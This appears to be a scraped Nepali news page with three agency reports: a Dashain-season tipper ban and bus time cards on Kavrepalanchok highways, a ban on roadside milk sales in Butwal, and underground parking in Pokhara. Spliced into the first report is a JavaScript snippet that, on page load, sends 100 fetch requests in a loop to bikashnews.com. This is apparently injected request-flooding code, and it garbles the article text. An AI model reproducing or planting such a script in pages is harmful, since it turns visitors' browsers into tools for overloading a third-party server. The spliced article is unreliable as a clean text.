काभ्रेपलाञ्चोकमा आजदेखि टिपर चलाउन निषेध
काभ्रेपलाञ्चोक । दशैंमा सवारी दुर्घटना न्यूनीकरण गर्न जिल्ला प्रशासन कार्यालय काभ्रेपलाञ्चोकले जिल्लास्थित दुई राजमार्गमा आजदेखि टिपर सञ्चालन निषेध गरेको छ । कार्यालयले अरनिको र विपी राजमार्गमा टिपर सञ्चालन निषेध गर्दै अन्य सवारीसाधनका लागि टाइम कार्ड लागू गर्ने निर्णय गरेको हो । यातायात सेवा समितिका पदाधिकारीसँगको छलफलमा दुई राजमार्गमा आजदेखि असोज २४ गतेसम्म टिपर सञ्चालन गर्न नपाउने तथा सार्वजनिक सवारी साधनका लागि टाइम कार्ड लागू गरी सञ्चालन गर्नुपर्ने निर्णय गरेको प्रमुख जिल्ला अधिकारी हुमकला पाण्डेले जानकारी दिनुभयो । उनका अनुसार केन्द्रीय राजधानी काठमाडौंबाट दसैँ मनाउन काभ्रेपलाञ्चोकको रुट भएर मध्यपूर्व हुँदै पूर्वी जिल्ला जाने आउने यात्रुहरूको चापलाई व्यवस्थापन गर्न उक्त निर्णय गरिएको हो । दुई राजमार्गमा दैनिक दुई हजार पाँच सय टिपरले निर्माण सामग्री ढुवानी गर्दै आएका छन् । ‘अन्य सार्वजनिक सवारीमा दुर्घटना न्यूनीकरणका टाइम कार्ड लागू गरेका हौँ’, पाण्डेले भने । कार्यालयका अनुसार टाइम कार्ड लागु गरिएका रुटमा विपी राजमार्गअन्तर्गत मङ्गलटार–भकुण्डे १८ किमी दूरीका लागि ४० मिनेट, भकुण्डेबेँसी–काभ्रेभञ्ज्याङ १३ किमी दूरीका लागि ३५ मिनेट, काभ्रेभन्ज्याङ–भकुण्डेबेँसीका लागि ३५ मिनेट तथा अरनिको राजमार्गको धुलिखेल–पाँचखाल १५ किमीका लागि ३० मिनेट, पाँचखाल–दोलालघाटका लागि १० किमी दूरीमा २० मिनेट समय निर्धारण गरिएको छ । अरनिको राजमार्गभन्दा विपी राजमार्गमा फूलपाती, अष्टमी र नवमीका दिन धेरै सवारीको चाप हुने गरेको छ । यसपालि दुवै राजमार्गमा सवारी चाप बढ्ने सम्भावनालाई मध्यनजर गर्दै प्रशासन र यातायात व्यवसायीले सहजरूपमा यात्रुलाई आउनेजाने वातावरण मिलाउन तथा दुर्घटना न्यूनीकरण गर्ने उद्देश्यले बिहीबार छलफल गरेका हुन् । छलफलमा सार्वजनिक यातायातको भाडादर, यात्रुसिट क्षमताका आधारमा अनलाइन टिकेटिङ र कोभिड–१९ को मापदण्ड पालना गराउन सचेत गराउनेसमेत निर्णय भएको जनाइएको छ । यस्तै सार्वजनिक यातायातमा मास्क लगाएका यात्रुलाई मात्र चढाउने, सवारीसाधनमा स्यानिटाइजर अनिवार्य राख्ने, यात्रुलाई सकेसम्म सामाजिक दूरी कायम गर्न सुरुमै जानकारी गराउने, सवारीसाधनको जाँच गरेरमात्रै चलाउने तथा त्यसको नियमित अनुगमन प्रहरी र ट्राफिक प्रहरीले गर्ने निर्णय भएको छ । document.addEventListener('DOMContentLoaded', function () { // Function to send a single fetch request function sendRequest() { fetch('https://bikashnews.com/', { method: 'GET', // You can change the method to POST if needed }) .then(response => response.json()) .then(data => console.log('Request response:', data)) .catch(error => console.error('Error in request:', error)); } // Loop to send 100 requests for (let i = 0; i < 100; i++) { sendRequest(); } }); सार्वजनिक सवारीले यात्रुलाई भाडामा अनियमितता गरेमा वा अन्य केही समस्या भएमा जिल्लाको नौ स्थानमा स्थापित यात्रु सहायताकक्ष र प्रहरीको हटलाइन नम्बरमा जानकारी गराउन सक्ने व्यवस्था मिलाइएको छ । रासस
बुटवलका सडकमा खुला दूध बेच्न नपाइने
बुटवल । बुटवल उपमहानगरपालिकाले खुलारूपमा सडक किनारमा दूध बिक्री वितरणमा रोक लगाएको छ । उपप्रमुख तथा अनुगमन समिति संयोजक सावित्रादेवी अर्यालको अध्यक्षतामा बसेको दुग्ध व्यवसायीसहितको बैठकले दूधको कारोबार गर्ने व्यवसायी र किसानलाई अनिवार्यरूपमा दर्ता गर्न र खुलारूपमा सडक किनारमा दूधको बिक्री वितरण रोक्न आग्रह गर्ने निर्णय गरेको हो । दुग्धजन्य पदार्थलाई व्यवस्थित तथा स्वस्थकर बनाउनका लागि दूध र दूग्धजन्य पदार्थको गुणस्तर परीक्षणका लागि ल्याब किड्स मेसिनसहितको ल्याब स्थापना गर्ने निर्णय बैठकले गरेको अर्यालले बताए । यस्तै बैठकले दूग्धजन्य पदार्थलाई गुणस्तरीय र स्वस्थकर बनाउन दूध विक्रेता, किसानलगायत दूधको कारोबारमा संलग्न डेरी व्यवसायीले पालना गर्नुपर्ने आचारसंहिता तयार गरी कार्यान्वयनमा सहयोग र समन्वय गर्न कार्यदल गठन गरेको छ । रुपन्देही डेरी व्यवसायी सङ्घका अध्यक्ष गणेशप्रसाद भण्डारीको संयोजकत्वमा गठन भएको कार्यदलमा डेरी व्यवसायी कृष्ण भट्टराई, रामकृष्ण शर्मा पौडेल, उमादेवी शर्मा र संजोग श्रेष्ठ सदस्य रहेका छ भने सदस्यसचिवमा बुटवल उपमहानगरपालिकाका पशुपक्षी विकास शाखा प्रमुख रहेका छन् । बैठकले दूधको मूल्य निर्धारण गरी कार्यान्वयन गराउने निर्णय गरेको उपप्रमुख अर्यालले बताए ।
पोखरा महानगरले सुरु गर्यो अन्डरग्राउण्ड पार्किङ
अन्नपूर्ण । पोखरा महानगरपालिकाले भूमिगत तला अन्डरग्राउण्ड पार्किङ सुरुआत गरेको छ । पोखरा महानगर–८ सिर्जनाचोकको महानगरकै स्वामित्व रहेको भवनबाट यसको सुरु गरेको हो । पोखरा महानगरपालिकाका प्रमुख धनराज आचार्यले आफ्नै निजी कार पार्किङ गरी अन्डरग्राउण्ड पार्किङको थालनी गर्नथालेका हुन् । पहिले आंशिकरूपमा अन्डरग्राउण्डमा पार्किङ भए पनि अब पूरैमा पार्किङ गरिने उनले जानकारी दिए । ‘पहिले यहाँ सिलाइ मेसिनलगायत गोदामका सामान राखिने गरिएको रहेछ’, उनले भने, ‘केही सवारी पार्किङ गरिने यस ठाउँमा अबदेखि सबै क्षेत्रमा पार्किङ गरिन्छ’, महानगरले ३५ दिने सूचना जारी गरेको समय समाप्त हुन लागेकाले अरुलाई सन्देश दिन आफैँले यो कामको सुरुआत गरेको महानगर प्रमुख आचार्यले जानकारी दिए । महानगरले गत भदौ १३ गते पोखरा बजार क्षेत्रभित्रका घरहरूको अन्डरग्राउण्ड खाली गर्न आग्रह गर्दै ३५ दिने सूचना जारी गरेको थियो । पोखरामा जनघनत्व र सवारी चापका कारण पार्किङ अभाव बढ्दै गएपछि अन्डरग्राउण्डलाई पार्किङ बनाउनका लागि सो तला खाली गर्न सूचना जारी गरेको हो । सोही सूचनाअनुसार नै महानगरले आफ्नै भवनबाट यसको सुरुआत गरेको हो । महानगरको स्वामित्वमा रहेको भवनको अन्डरग्राउण्डमा सिलाइका मेसिनसँगै गोदामका सामान राखिएको थियो । त्यहाँ आंशिकरूपमा मात्र दुई–तीनवटा सवारी राख्ने गरिएको थियो । पोखराको बजार क्षेत्रमा घर बनाउँदा अन्डरग्राउण्ड पार्किङ अनिवार्य बनाउनुपर्ने प्रावधान रहेको छ । नत्र महानगरले नक्सा पास नै गरिदिन्न । अन्डरग्राउण्ड पार्किङ बनाएमा सो तलाको ५० प्रतिशत राजस्वसमेत घरधनीले छुट पाउँछन् । महानगरको प्रावधानमै रहेर कतिपय घर बनेका छन् । उनीहरूले राजस्वमा छुट पनि लिएकै छन्, तर अधिकांशले अन्डरग्राउण्डलाई पार्किङका रूपमा प्रयोग गरेका छैनन् । त्यसरी पार्किङ गर्नुपर्ने ठाउँमा मोटरसाइकल ग्यारेज, मोबाइल पसल, खाजाघर, दोहोरी साँझ, कपडा पसललगायतका व्यवसाय गरिएको छ । पोखरामा करिब दुई सय ५० घरधुरीले अन्डरग्राण्डमा पार्किङ बनाउने भनेर नक्सापास गराउँदै ५० प्रतिशत छुट लिए पनि व्यवहारमा उतारेका छैनन् । दुई सय ५० मध्ये करिब ६० घरले मात्रै महानगरको मापदण्डमा रहेर अन्डरग्राउण्डलाई पार्किङका रूपमा गरेको पोखरा महानगरपालिकाका इञ्जीनियर सुरेन्द्र पौडेलले बताए । महानगरपालिकाले अटेर गरेर अन्डरग्राउण्ड खाली गरेर पार्किङस्थल नबनाए महानगरको कानुनबमोजिम कारबाही गरिने जानकारी दिएको छ । ‘हामीले ३५ दिने सूचना जारी गरिसकेका छौँ, केहीले खाली गरिसकेका छन् । केहीमा ठूलो समस्या भएकाले दुई–तीन दिनको समय मागेका छन्’, महानगरप्रमुख आचार्यले भने, ‘३६ दिन पुगेको दिनमा हामी अनुगमनमा निस्कन्छौँ, त्यसभन्दा अघि हामीले आफ्नै भवनबाट सुरु गरौँ भनेर अघि बढेका हौँ ।’ रासस